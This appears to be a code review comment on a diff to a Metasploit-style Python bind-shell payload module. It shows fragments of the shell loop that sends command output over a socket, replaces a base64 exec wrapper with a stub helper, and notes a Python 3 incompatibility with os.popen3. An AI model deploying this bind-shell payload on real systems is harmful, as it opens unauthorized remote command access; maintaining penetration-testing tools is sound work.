modules/payloads/singles/python/shell_bind_tcp.rb

```diff
@@ -49,8 +50,6 @@ def command_string
     cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-   # base64
-   cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-   cmd
+    py_create_exec_stub(cmd)
```

Comment:
2.7 works, however I'm getting an error due to `os.popen3` not being available on Python3. Looks like that will need to be updated too.